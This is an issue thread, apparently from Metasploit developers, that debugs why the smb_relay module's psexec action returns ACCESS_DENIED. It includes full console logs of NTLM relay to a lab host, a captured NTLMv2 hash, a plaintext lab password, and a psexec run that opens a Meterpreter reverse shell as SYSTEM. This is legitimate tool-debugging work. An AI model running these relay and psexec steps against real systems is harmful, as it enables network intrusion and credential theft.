smb_relay psexec action fails to get session, even when authenticated as Domain Admin

[bwatters-r7]

I appear to be authenticating just fine, but then get ACCESS_DENIED when using the psexec action.

=[ metasploit v6.4.38-dev-d5b71aa581 ]

msf6 exploit(windows/smb/smb_relay) > show options

Module options (exploit/windows/smb/smb_relay):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   CAINPWFILE                             no        Name of file to store Cain&Abel hashes in. Only supports NTLMv1 hashes. Can be
                                                    a path.
   JOHNPWFILE                             no        Name of file to store JohnTheRipper hashes in. Supports NTLMv1 and NTLMv2 hashe
                                                    s, each of which is stored in separate files. Can also be a path.
   RELAY_TARGETS         10.5.132.182     yes       Target address range or CIDR identifier to relay to
   RELAY_TIMEOUT         25               yes       Seconds that the relay socket will wait for a response after the client has ini
                                                    tiated communication.
   SERVICE_DESCRIPTION                    no        Service description to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                   no        The service display name
   SERVICE_NAME                           no        The service name
   SMBDomain             .                no        The Windows domain to use for authentication
   SMBSHARE                               no        The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read
                                                    /write folder share
   SRVHOST               0.0.0.0          yes       The local host or network interface to listen on. This must be an address on th
                                                    e local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT               445              yes       The local port to listen on.
   SRV_TIMEOUT           25               yes       Seconds that the server socket will wait for a response after the client has in
                                                    itiated communication.


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.5.135.201     yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic



Exploit action:

   Name    Description
   ----    -----------
   PSEXEC  Use the SMB Connection to run the exploit/windows/psexec module against the relay target



View the full module info with the info, or info -d command.

msf6 exploit(windows/smb/smb_relay) > set verbose true
verbose => true
msf6 exploit(windows/smb/smb_relay) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 10.5.135.201:4444 
[*] SMB Server is running. Listening on 0.0.0.0:445
msf6 exploit(windows/smb/smb_relay) > [*] Server started.
[*] New request from 10.5.132.181
I, [2024-11-22T10:27:31.064681 #3457]  INFO -- : Starting thread for connection from 10.5.132.181
I, [2024-11-22T10:27:31.080512 #3457]  INFO -- : Negotiated dialect: SMB v2.0.2
D, [2024-11-22T10:27:31.083968 #3457] DEBUG -- : Dispatching request to do_session_setup_smb2 (session: nil)
D, [2024-11-22T10:27:31.088629 #3457] DEBUG -- : Dispatching request to do_session_setup_smb2 (session: #<Session id: 965129682, user_id: nil, state: :in_progress>)
I, [2024-11-22T10:27:31.089258 #3457]  INFO -- : NTLM authentication request overridden to succeed for EXAMPLE\Administrator
D, [2024-11-22T10:27:31.093122 #3457] DEBUG -- : Dispatching request to do_tree_connect_smb2 (session: #<Session id: 965129682, user_id: "EXAMPLE\\Administrator", state: :valid>)
[*] Received request for EXAMPLE\Administrator
[*] Relaying to next target smb://10.5.132.182:445
D, [2024-11-22T10:27:31.102799 #3457] DEBUG -- : Dispatching request to do_session_setup_smb2 (session: #<Session id: 965129682, user_id: "EXAMPLE\\Administrator", state: :in_progress>)
I, [2024-11-22T10:27:31.104071 #3457]  INFO -- : Relaying NTLM type 1 message to 10.5.132.182 (Always Sign: true, Sign: true, Seal: false)
D, [2024-11-22T10:27:31.131925 #3457] DEBUG -- : Dispatching request to do_session_setup_smb2 (session: #<Session id: 965129682, user_id: "EXAMPLE\\Administrator", state: :in_progress>)
I, [2024-11-22T10:27:31.133832 #3457]  INFO -- : Relaying NTLMv2 type 3 message to smb://10.5.132.182:445 as EXAMPLE\Administrator
[+] Identity: EXAMPLE\Administrator - Successfully authenticated against relay target smb://10.5.132.182:445
[SMB] NTLMv2-SSP Client     : 10.5.132.182
[SMB] NTLMv2-SSP Username   : EXAMPLE\Administrator
[SMB] NTLMv2-SSP Hash       : Administrator::EXAMPLE:079f5ab963313aca:92293435dd6a03d6bad87cffb3cceaad:01010000000000003590a56dfb3cdb0110adea21f20d79a00000000002000e004500580041004d0050004c00450001001e00570049004e002d00440052004300390048004300440049004d0041005400040016006500780061006d0070006c0065002e0063006f006d0003003600570049004e002d00440052004300390048004300440049004d00410054002e006500780061006d0070006c0065002e0063006f006d00050016006500780061006d0070006c0065002e0063006f006d00070008003590a56dfb3cdb0106000400020000000800300030000000000000000100000000200000ed167b4f6270d072cfe535a4835f2ad50c97dc0c4e4f2e7e326e2acbb4766f670a001000000000000000000000000000000000000900220063006900660073002f00310030002e0035002e003100330035002e003200300031000000000000000000

[*] 10.5.132.182:445 - Running psexec
D, [2024-11-22T10:27:31.149237 #3457] DEBUG -- : Dispatching request to do_tree_connect_smb2 (session: #<Session id: 965129682, user_id: "EXAMPLE\\Administrator", state: :valid>)
[*] Received request for EXAMPLE\Administrator
[-] Failed running psexec against target  - RubySMB::Error::UnexpectedStatusCode The server responded with an unexpected status code: STATUS_ACCESS_DENIED

[smcintyre-r7]

Does the regular PSExec module work? If not, have you disabled Remote UAC. That'll trigger a STATUS_ACCESS_DENIED error IIRC.

[bwatters-r7]

Regular psexec works just fine:

msf6 exploit(windows/smb/psexec) > show options

Module options (exploit/windows/smb/psexec):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   SERVICE_DESCRIPTION                    no        Service description to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                   no        The service display name
   SERVICE_NAME                           no        The service name
   SMBSHARE                               no        The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read
                                                    /write folder share


   Used when connecting via an existing SESSION:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   no        The session to run this module on


   Used when making a new connection via RHOSTS:

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOSTS     10.5.132.182     no        The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-met
                                         asploit.html
   RPORT      445              no        The target port (TCP)
   SMBDomain  .                no        The Windows domain to use for authentication
   SMBPass    v3Mpassword      no        The password for the specified username
   SMBUser    Administrator    no        The username to authenticate as


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.5.135.201     yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic



View the full module info with the info, or info -d command.

msf6 exploit(windows/smb/psexec) > run

[*] Started reverse TCP handler on 10.5.135.201:4444 
[*] 10.5.132.182:445 - Connecting to the server...
[*] 10.5.132.182:445 - Authenticating to 10.5.132.182:445 as user 'Administrator'...
[!] 10.5.132.182:445 - No active DB -- Credential data will not be saved!
[*] 10.5.132.182:445 - Checking for System32\WindowsPowerShell\v1.0\powershell.exe
[*] 10.5.132.182:445 - PowerShell found
[*] 10.5.132.182:445 - Selecting PowerShell target
[*] 10.5.132.182:445 - Powershell command length: 4334
[*] 10.5.132.182:445 - Executing the payload...
[*] 10.5.132.182:445 - Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:10.5.132.182[\svcctl] ...
[*] 10.5.132.182:445 - Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:10.5.132.182[\svcctl] ...
[*] 10.5.132.182:445 - Obtaining a service manager handle...
[*] 10.5.132.182:445 - Creating the service...
[+] 10.5.132.182:445 - Successfully created the service
[*] 10.5.132.182:445 - Starting the service...
[*] Sending stage (177734 bytes) to 10.5.132.182
[+] 10.5.132.182:445 - Service start timed out, OK if running a command or non-service executable...
[*] 10.5.132.182:445 - Removing the service...
[+] 10.5.132.182:445 - Successfully removed the service
[*] 10.5.132.182:445 - Closing service handle...
[*] Meterpreter session 1 opened (10.5.135.201:4444 -> 10.5.132.182:61158) at 2024-11-22 10:48:16 -0600

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 

[bwatters-r7]

Also, for what it is worth, I can get an smb session with the relay module just fine.

[smcintyre-r7]

Hmm the plot thickens... What if you try the psexec module with the session opened by the relay module? That'd help identify if it's something with the session or how the module is running the operation. I think both modules use the same underlying psexec library code though, but there could be some odd variance.

[bwatters-r7]

Psexec does not work with the smb_session

msf6 exploit(windows/smb/psexec) > show options

Module options (exploit/windows/smb/psexec):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   SERVICE_DESCRIPTION                    no        Service description to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                   no        The service display name
   SERVICE_NAME                           no        The service name
   SMBSHARE                               no        The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read
                                                    /write folder share


   Used when connecting via an existing SESSION:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  1                no        The session to run this module on


   Used when making a new connection via RHOSTS:

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOSTS                      no        The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-met
                                         asploit.html
   RPORT      445              no        The target port (TCP)
   SMBDomain  .                no        The Windows domain to use for authentication
   SMBPass                     no        The password for the specified username
   SMBUser                     no        The username to authenticate as


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.5.135.201     yes       The listen address (an interface may be specified)
   LPORT     4571             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic



View the full module info with the info, or info -d command.

msf6 exploit(windows/smb/psexec) > run

[*] Started reverse TCP handler on 10.5.135.201:4571 
[*] Using existing session 1
[-] Exploit failed [no-access]: RubySMB::Error::UnexpectedStatusCode The server responded with an unexpected status code: STATUS_ACCESS_DENIED
[*] Exploit completed, but no session was created.
msf6 exploit(windows/smb/psexec) > 

[smashery]

I'm actually seeing almost nothing working. The SMB session is "established"; but even basic tasks like enumerating pipes comes back with ACCESS_DENIED.

[smashery]

Does the host you're targeting definitely have SMB signing disabled? I see this behaviour on hosts with SMB signing enabled. Really, the module should warn/fail if it's enabled, rather than claiming it's succeeded but never achieving anything.